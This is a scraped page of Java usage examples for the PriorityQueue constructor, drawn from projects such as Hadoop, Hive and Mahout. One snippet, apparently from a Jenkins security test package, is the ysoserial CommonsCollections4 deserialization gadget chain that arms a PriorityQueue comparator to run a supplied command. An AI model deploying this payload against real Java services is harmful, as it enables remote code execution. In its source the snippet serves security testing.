Example usage for java.util PriorityQueue PriorityQueue

List of usage examples for java.util PriorityQueue PriorityQueue

Introduction

In this page you can find the example usage for java.util PriorityQueue PriorityQueue.

Prototype

public PriorityQueue(int initialCapacity, Comparator<? super E> comparator) 

Source Link

Document

Creates a PriorityQueue with the specified initial capacity that orders its elements according to the specified comparator.

Usage

From source file:org.petalslink.dsb.federation.core.server.ServiceManagerImpl.java

/**
 * {@inheritDoc}//  ww w . j a  v  a  2s . c  o m
 */
public void start() {

    // first start the internal services...
    if (logger.isDebugEnabled()) {
        logger.debug("Starting internal services");
    }
    PriorityQueue<Service> queue = new PriorityQueue<Service>(this.services.size(), new Comparator());
    for (String name : this.services.keySet()) {
        if ((this.services.get(name) != null) && (this.services.get(name).getType() == Service.TYPE.INTERNAL)) {
            queue.add(this.services.get(name));
        }
    }
    Service s = null;
    while ((s = queue.poll()) != null) {
        this.start(s.getName());
    }

    if (logger.isDebugEnabled()) {
        logger.debug("Starting *bound services");
    }
    queue = new PriorityQueue<Service>(this.services.size(), new Comparator());
    for (String name : this.services.keySet()) {
        if ((this.services.get(name) != null) && (this.services.get(name).getType() != Service.TYPE.INTERNAL)) {
            queue.add(this.services.get(name));
        }
    }
    while ((s = queue.poll()) != null) {
        this.start(s.getName());
    }
}

From source file:com.joliciel.csvLearner.features.BestFeatureFinder.java

public List<NameValuePair> getBestFeatures(GenericEvents events, String testOutcome, int featureCount) {
    LOG.debug("testOutcome: " + testOutcome);
    List<NameValuePair> bestFeatures = new ArrayList<NameValuePair>();

    RealValueFeatureEvaluator evaluator = new RealValueFeatureEvaluator();
    evaluator.setFeatureSplitter(featureSplitter);
    try {//from w  ww . ja v  a 2  s.  c  om
        Set<String> features = events.getFeatures();

        PriorityQueue<NameValuePair> heap = new PriorityQueue<NameValuePair>(features.size(),
                new NameValueDescendingComparator());
        double eventSpaceEntropy = -1;
        for (String feature : features) {
            List<Double> featureEntropies = evaluator.evaluateFeature(events, feature, testOutcome);
            double informationGain = featureEntropies.get(0)
                    - featureEntropies.get(featureEntropies.size() - 1);
            if (eventSpaceEntropy < 0)
                eventSpaceEntropy = featureEntropies.get(0);
            NameValuePair pair = new NameValuePair(feature, informationGain);
            heap.add(pair);
        }
        bestFeatures.add(new NameValuePair(TOTAL_ENTROPY, eventSpaceEntropy));
        for (int i = 0; i < featureCount; i++) {
            NameValuePair pair = heap.poll();
            if (pair == null)
                break;
            LOG.debug("feature: " + pair.getName() + ", " + pair.getValue());

            bestFeatures.add(pair);
        }
        heap = null;
    } finally {
        evaluator.logPerformance();
    }
    return bestFeatures;
}

From source file:com.datatorrent.lib.util.TopNUniqueSort.java

/**
 * Constructs and sets values accordingly
 * @param initialCapacity/*from   ww  w  .  j  av a  2s .co m*/
 * @param bound
 * @param flag
 */
public TopNUniqueSort(int initialCapacity, int bound, boolean flag) {
    ascending = flag;
    // Ascending use of pqueue needs a descending comparator
    q = new PriorityQueue<E>(initialCapacity, new ReversibleComparator<E>(flag));
    qbound = bound;
    hmap = new HashMap<E, MutableInt>();
}

From source file:EntityClustering.MarkovClustering.java

@Override
public List<EquivalenceCluster> getDuplicates(SimilarityPairs simPairs) {
    initializeGraph(simPairs);//from  www  . j  a v  a 2  s  . c o  m
    SimilarityEdgeComparator SEcomparator = new SimilarityEdgeComparator();
    PriorityQueue<SimilarityEdge> SEqueue = new PriorityQueue<SimilarityEdge>(simPairs.getNoOfComparisons(),
            SEcomparator);
    // add an edge for every pair of entities with a weight higher than the threshold
    double threshold = getSimilarityThreshold(simPairs);
    Iterator<Comparison> iterator = simPairs.getPairIterator();
    double[][] simMatrix = new double[noOfEntities][noOfEntities];
    while (iterator.hasNext()) {
        Comparison comparison = iterator.next();
        if (threshold < comparison.getUtilityMeasure()) {
            simMatrix[comparison.getEntityId1()][comparison.getEntityId2() + datasetLimit] = comparison
                    .getUtilityMeasure();
        }
    }
    addSelfLoop(simMatrix);
    Normalize(simMatrix);
    double[][] atStart = new double[noOfEntities][noOfEntities];
    int count = 0;
    do {
        for (int i = 0; i < noOfEntities; i++)
            for (int j = 0; j < noOfEntities; j++)
                atStart[i][j] = simMatrix[i][j];
        expand2(simMatrix);
        Normalize(simMatrix);
        Hadamard(simMatrix, 2);
        Normalize(simMatrix);
        count++;

    } while ((!areSimilar(atStart, simMatrix)) && (count < similarityChecksLimit));

    int n1 = simMatrix.length;
    int upLimit = n1;
    int lowLimit = 0;
    if (datasetLimit != 0) {
        upLimit = datasetLimit;
        lowLimit = datasetLimit;
    }
    for (int i = 0; i < upLimit; i++) {
        for (int j = lowLimit; j < n1; j++) {
            int v1 = i;
            int v2 = j;
            double sim = Math.max(simMatrix[i][j], simMatrix[j][i]);
            if ((sim > clusterThreshold) && (i != j)) {
                similarityGraph.addEdge(v1, v2);
            }
        }
    }

    // get connected components
    ConnectivityInspector ci = new ConnectivityInspector(similarityGraph);
    List<Set<Integer>> connectedComponents = ci.connectedSets();

    // prepare output
    List<EquivalenceCluster> equivalenceClusters = new ArrayList<>();
    for (Set<Integer> componentIds : connectedComponents) {
        EquivalenceCluster newCluster = new EquivalenceCluster();
        equivalenceClusters.add(newCluster);
        if (!simPairs.isCleanCleanER()) {
            newCluster.loadBulkEntityIdsD1(componentIds);
            continue;
        }

        for (Integer entityId : componentIds) {
            if (entityId < datasetLimit) {
                newCluster.addEntityIdD1(entityId);
            } else {
                newCluster.addEntityIdD2(entityId - datasetLimit);
            }
        }

    }
    return equivalenceClusters;
}

From source file:org.apache.mahout.classifier.bayes.algorithm.BayesAlgorithm.java

@Override
public ClassifierResult[] classifyDocument(String[] document, Datastore datastore, String defaultCategory,
        int numResults) throws InvalidDatastoreException {
    Collection<String> categories = datastore.getKeys("labelWeight");
    PriorityQueue<ClassifierResult> pq = new PriorityQueue<ClassifierResult>(numResults,
            new ByScoreLabelResultComparator());
    for (String category : categories) {
        double prob = documentWeight(datastore, category, document);
        if (prob > 0.0) {
            pq.add(new ClassifierResult(category, prob));
            if (pq.size() > numResults) {
                pq.remove();/*from   www  .  ja  v a2 s. com*/
            }
        }
    }

    if (pq.isEmpty()) {
        return new ClassifierResult[] { new ClassifierResult(defaultCategory, 0.0) };
    } else {
        List<ClassifierResult> result = new ArrayList<ClassifierResult>(pq.size());
        while (pq.isEmpty() == false) {
            result.add(pq.remove());
        }
        Collections.reverse(result);
        return result.toArray(new ClassifierResult[pq.size()]);
    }
}

From source file:com.aliyun.odps.mapred.local.MapOutputBuffer.java

public MapOutputBuffer(JobConf conf, int reduceNum) {

    Column[] key = conf.getMapOutputKeySchema();
    if (key != null) {
        String[] partCols = conf.getPartitionColumns();
        this.partColIdxs = new int[partCols.length];
        Map<String, Integer> reverseLookupMap = new HashMap<String, Integer>();
        int i = 0;
        for (Column c : key) {
            reverseLookupMap.put(c.getName(), i);
            i++;//from ww  w.  java 2 s .c o  m
        }
        i = 0;
        for (String col : partCols) {
            partColIdxs[i] = reverseLookupMap.get(col);
        }

        numReduce = reduceNum;
        String[] sortColumns = conf.getOutputKeySortColumns();
        SortOrder[] sortOrders = conf.getOutputKeySortOrder();
        comparator = new LocalColumnBasedRecordComparator(sortColumns, key, sortOrders);
        buffers = new ArrayList<PriorityQueue<Object[]>>(numReduce);
        for (i = 0; i < numReduce; i++) {
            buffers.add(new PriorityQueue<Object[]>(16, comparator));
        }
    }

}

From source file:org.apache.hadoop.hdfs.server.namenode.TestFileJournalManager.java

/**
 * Find out how many transactions we can read from a
 * FileJournalManager, starting at a given transaction ID.
 * //from w ww . ja  v  a  2 s .c  o m
 * @param jm              The journal manager
 * @param fromTxId        Transaction ID to start at
 * @param inProgressOk    Should we consider edit logs that are not finalized?
 * @return                The number of transactions
 * @throws IOException
 */
static long getNumberOfTransactions(FileJournalManager jm, long fromTxId, boolean inProgressOk,
        boolean abortOnGap) throws IOException {
    long numTransactions = 0, txId = fromTxId;
    final PriorityQueue<EditLogInputStream> allStreams = new PriorityQueue<EditLogInputStream>(64,
            JournalSet.EDIT_LOG_INPUT_STREAM_COMPARATOR);
    jm.selectInputStreams(allStreams, fromTxId, inProgressOk);
    EditLogInputStream elis = null;
    try {
        while ((elis = allStreams.poll()) != null) {
            try {
                elis.skipUntil(txId);
                while (true) {
                    FSEditLogOp op = elis.readOp();
                    if (op == null) {
                        break;
                    }
                    if (abortOnGap && (op.getTransactionId() != txId)) {
                        LOG.info("getNumberOfTransactions: detected gap at txId " + fromTxId);
                        return numTransactions;
                    }
                    txId = op.getTransactionId() + 1;
                    numTransactions++;
                }
            } finally {
                IOUtils.cleanup(LOG, elis);
            }
        }
    } finally {
        IOUtils.cleanup(LOG, allStreams.toArray(new EditLogInputStream[0]));
    }
    return numTransactions;
}

From source file:org.apache.hadoop.hive.ql.exec.tez.tools.KeyValueInputMerger.java

public KeyValueInputMerger(List<KeyValueReader> multiMRInputs, Deserializer deserializer,
        ObjectInspector[] inputObjInspectors, List<String> sortCols) throws Exception {
    //get KeyValuesReaders from the LogicalInput and add them to priority queue
    int initialCapacity = multiMRInputs.size();
    pQueue = new PriorityQueue<KeyValueReader>(initialCapacity, new KVReaderComparator());
    this.inputObjInspectors = inputObjInspectors;
    this.deserializer = deserializer;
    fieldOIs = new ArrayList<ObjectInspector>();
    structFields = new ArrayList<StructField>();
    StructObjectInspector structOI = (StructObjectInspector) inputObjInspectors[0];
    for (String field : sortCols) {
        StructField sf = structOI.getStructFieldRef(field);
        structFields.add(sf);//  w w w.  j  ava  2  s .  c o  m
        ObjectInspector stdOI = ObjectInspectorUtils.getStandardObjectInspector(sf.getFieldObjectInspector());
        fieldOIs.add(stdOI);
    }
    l4j.info("Initialized the priority queue with multi mr inputs: " + multiMRInputs.size());
    for (KeyValueReader input : multiMRInputs) {
        addToQueue(input);
    }
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java

public Queue<Object> getObject(final String command) throws Exception {
    Object templates = Gadgets.createTemplatesImpl(command);

    ConstantTransformer constant = new ConstantTransformer(String.class);

    // mock method name until armed
    Class[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args);

    // grab defensively copied arrays
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

    // create queue with numbers
    PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
    queue.add(1);/*from   w  w  w.  jav  a 2 s. co m*/
    queue.add(1);

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return queue;
}

From source file:org.apache.hadoop.tools.rumen.DeskewedJobTraceReader.java

/**
 * Constructor.//from  w  ww.j a va2  s.  co  m
 * 
 * @param reader
 *          the {@link JobTraceReader} that's being protected
 * @param skewBufferSize
 *          [the number of late jobs that can preced a later out-of-order
 *          earlier job
 * @throws IOException
 */
public DeskewedJobTraceReader(JobTraceReader reader, int skewBufferLength, boolean abortOnUnfixableSkew)
        throws IOException {
    this.reader = reader;

    this.skewBufferLength = skewBufferLength;

    this.abortOnUnfixableSkew = abortOnUnfixableSkew;

    skewBuffer = new PriorityQueue<LoggedJob>(skewBufferLength + 1, new JobComparator());

    fillSkewBuffer();
}